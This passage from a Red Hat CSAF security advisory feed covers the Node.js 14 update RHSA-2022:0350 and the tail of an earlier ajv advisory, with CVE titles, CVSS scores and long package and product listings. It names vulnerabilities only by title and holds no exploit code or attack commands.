"7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0421" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-ajv: prototype pollution via crafted JSON schema in ajv.validate function" } ] }
rhsa-2022_0350
Vulnerability from csaf_redhat
Published
2022-02-01 21:18
Modified
2024-11-15 10:46
Summary
Red Hat Security Advisory: nodejs:14 security, bug fix, and enhancement update
Notes
Topic
An update for the nodejs:14 module is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language.
The following packages have been upgraded to a later upstream version: nodejs (14.18.2), nodejs-nodemon (2.0.15). (BZ#2027609)
Security Fix(es):
* nodejs-json-schema: Prototype pollution vulnerability (CVE-2021-3918)
* nodejs-ini: Prototype pollution via malicious INI file (CVE-2020-7788)
* nodejs-glob-parent: Regular expression denial of service (CVE-2020-28469)
* nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes (CVE-2021-3807)
* normalize-url: ReDoS for data URLs (CVE-2021-33502)
* nodejs-tar: Insufficient symlink protection due to directory cache poisoning using symbolic links allowing arbitrary file creation and overwrite (CVE-2021-37701)
* nodejs-tar: Insufficient symlink protection due to directory cache poisoning using symbolic links allowing arbitrary file creation and overwrite (CVE-2021-37712)
* llhttp: HTTP Request Smuggling due to spaces in headers (CVE-2021-22959)
* llhttp: HTTP Request Smuggling when parsing the body of chunked requests (CVE-2021-22960)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Moderate" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "An update for the nodejs:14 module is now available for Red Hat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. \n\nThe following packages have been upgraded to a later upstream version: nodejs (14.18.2), nodejs-nodemon (2.0.15). (BZ#2027609)\n\nSecurity Fix(es):\n\n* nodejs-json-schema: Prototype pollution vulnerability (CVE-2021-3918)\n\n* nodejs-ini: Prototype pollution via malicious INI file (CVE-2020-7788)\n\n* nodejs-glob-parent: Regular expression denial of service (CVE-2020-28469)\n\n* nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes (CVE-2021-3807)\n\n* normalize-url: ReDoS for data URLs (CVE-2021-33502)\n\n* nodejs-tar: Insufficient symlink protection due to directory cache poisoning using symbolic links allowing arbitrary file creation and overwrite (CVE-2021-37701)\n\n* nodejs-tar: Insufficient symlink protection due to directory cache poisoning using symbolic links allowing arbitrary file creation and overwrite (CVE-2021-37712)\n\n* llhttp: HTTP Request Smuggling due to spaces in headers (CVE-2021-22959)\n\n* llhttp: HTTP Request Smuggling when parsing the body of chunked requests (CVE-2021-22960)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2022:0350", "url": "https://access.redhat.com/errata/RHSA-2022:0350" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#moderate", "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "category": "external", "summary": "1907444", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1907444" }, { "category": "external", "summary": "1945459", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1945459" }, { "category": "external", "summary": "1964461", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1964461" }, { "category": "external", "summary": "1999731", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1999731" }, { "category": "external", "summary": "1999739", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1999739" }, { "category": "external", "summary": "2007557", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2007557" }, { "category": "external", "summary": "2014057", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2014057" }, { "category": "external", "summary": "2014059", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2014059" }, { "category": "external", "summary": "2024702", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2024702" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2022/rhsa-2022_0350.json" } ], "title": "Red Hat Security Advisory: nodejs:14 security, bug fix, and enhancement update", "tracking": { "current_release_date": "2024-11-15T10:46:15+00:00", "generator": { "date": "2024-11-15T10:46:15+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.1" } }, "id": "RHSA-2022:0350", "initial_release_date": "2022-02-01T21:18:22+00:00", "revision_history": [ { "date": "2022-02-01T21:18:22+00:00", "number": "1", "summary": "Initial version" }, { "date": "2022-02-01T21:18:22+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-11-15T10:46:15+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat Enterprise Linux AppStream (v. 8)", "product": { "name": "Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN", "product_identification_helper": { "cpe": "cpe:/a:redhat:enterprise_linux:8::appstream" } } } ], "category": "product_family", "name": "Red Hat Enterprise Linux" }, { "branches": [ { "category": "product_version", "name": "nodejs:14:8050020211213115342:c5368500", "product": { "name": "nodejs:14:8050020211213115342:c5368500", "product_id": "nodejs:14:8050020211213115342:c5368500", "product_identification_helper": { "purl": "pkg:rpmmod/redhat/nodejs@14:8050020211213115342:c5368500" } } }, { "category": "product_version", "name": "nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "product": { "name": "nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "product_id": "nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-docs@14.18.2-2.module%2Bel8.5.0%2B13644%2B8d46dafd?arch=noarch\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "product": { "name": "nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "product_id": "nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-nodemon@2.0.15-1.module%2Bel8.5.0%2B13504%2Ba2e74d91?arch=noarch" } } }, { "category": "product_version", "name": "nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "product": { "name": "nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "product_id": "nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-packaging@23-3.module%2Bel8.3.0%2B6519%2B9f98ed83?arch=noarch" } } } ], "category": "architecture", "name": "noarch" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "product": { "name": "nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "product_id": "nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@14.18.2-2.module%2Bel8.5.0%2B13644%2B8d46dafd?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "product": { "name": "nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "product_id": "nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debuginfo@14.18.2-2.module%2Bel8.5.0%2B13644%2B8d46dafd?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "product": { "name": "nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "product_id": "nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debugsource@14.18.2-2.module%2Bel8.5.0%2B13644%2B8d46dafd?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "product": { "name": "nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "product_id": "nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-devel@14.18.2-2.module%2Bel8.5.0%2B13644%2B8d46dafd?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "product": { "name": "nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "product_id": "nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-full-i18n@14.18.2-2.module%2Bel8.5.0%2B13644%2B8d46dafd?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "product": { "name": "npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "product_id": "npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/npm@6.14.15-1.14.18.2.2.module%2Bel8.5.0%2B13644%2B8d46dafd?arch=ppc64le\u0026epoch=1" } } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "product": { "name": "nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "product_id": "nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@14.18.2-2.module%2Bel8.5.0%2B13644%2B8d46dafd?arch=src\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "product": { "name": "nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "product_id": "nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-nodemon@2.0.15-1.module%2Bel8.5.0%2B13504%2Ba2e74d91?arch=src" } } }, { "category": "product_version", "name": "nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "product": { "name": "nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "product_id": "nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-packaging@23-3.module%2Bel8.3.0%2B6519%2B9f98ed83?arch=src" } } } ], "category": "architecture", "name": "src" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "product": { "name": "nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "product_id": "nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@14.18.2-2.module%2Bel8.5.0%2B13644%2B8d46dafd?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "product": { "name": "nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "product_id": "nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debuginfo@14.18.2-2.module%2Bel8.5.0%2B13644%2B8d46dafd?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "product": { "name": "nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "product_id": "nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debugsource@14.18.2-2.module%2Bel8.5.0%2B13644%2B8d46dafd?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "product": { "name": "nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "product_id": "nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-devel@14.18.2-2.module%2Bel8.5.0%2B13644%2B8d46dafd?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "product": { "name": "nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "product_id": "nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-full-i18n@14.18.2-2.module%2Bel8.5.0%2B13644%2B8d46dafd?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", "product": { "name": "npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", "product_id": "npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/npm@6.14.15-1.14.18.2.2.module%2Bel8.5.0%2B13644%2B8d46dafd?arch=aarch64\u0026epoch=1" } } } ], "category": "architecture", "name": "aarch64" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "product": { "name": "nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "product_id": "nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@14.18.2-2.module%2Bel8.5.0%2B13644%2B8d46dafd?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "product": { "name": "nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "product_id": "nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debuginfo@14.18.2-2.module%2Bel8.5.0%2B13644%2B8d46dafd?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "product": { "name": "nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "product_id": "nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debugsource@14.18.2-2.module%2Bel8.5.0%2B13644%2B8d46dafd?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "product": { "name": "nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "product_id": "nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-devel@14.18.2-2.module%2Bel8.5.0%2B13644%2B8d46dafd?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "product": { "name": "nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "product_id": "nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-full-i18n@14.18.2-2.module%2Bel8.5.0%2B13644%2B8d46dafd?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "product": { "name": "npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "product_id": "npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/npm@6.14.15-1.14.18.2.2.module%2Bel8.5.0%2B13644%2B8d46dafd?arch=s390x\u0026epoch=1" } } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "product": { "name": "nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "product_id": "nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@14.18.2-2.module%2Bel8.5.0%2B13644%2B8d46dafd?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "product": { "name": "nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "product_id": "nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debuginfo@14.18.2-2.module%2Bel8.5.0%2B13644%2B8d46dafd?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "product": { "name": "nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "product_id": "nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debugsource@14.18.2-2.module%2Bel8.5.0%2B13644%2B8d46dafd?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "product": { "name": "nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "product_id": "nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-devel@14.18.2-2.module%2Bel8.5.0%2B13644%2B8d46dafd?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "product": { "name": "nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "product_id": "nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-full-i18n@14.18.2-2.module%2Bel8.5.0%2B13644%2B8d46dafd?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64", "product": { "name": "npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64", "product_id": "npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/npm@6.14.15-1.14.18.2.2.module%2Bel8.5.0%2B13644%2B8d46dafd?arch=x86_64\u0026epoch=1" } } } ], "category": "architecture", "name": "x86_64" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" }, "product_reference": "nodejs:14:8050020211213115342:c5368500", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64 as a component of nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64" }, "product_reference": "nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le as a component of nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le" }, "product_reference": "nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "relates_to_product_reference": 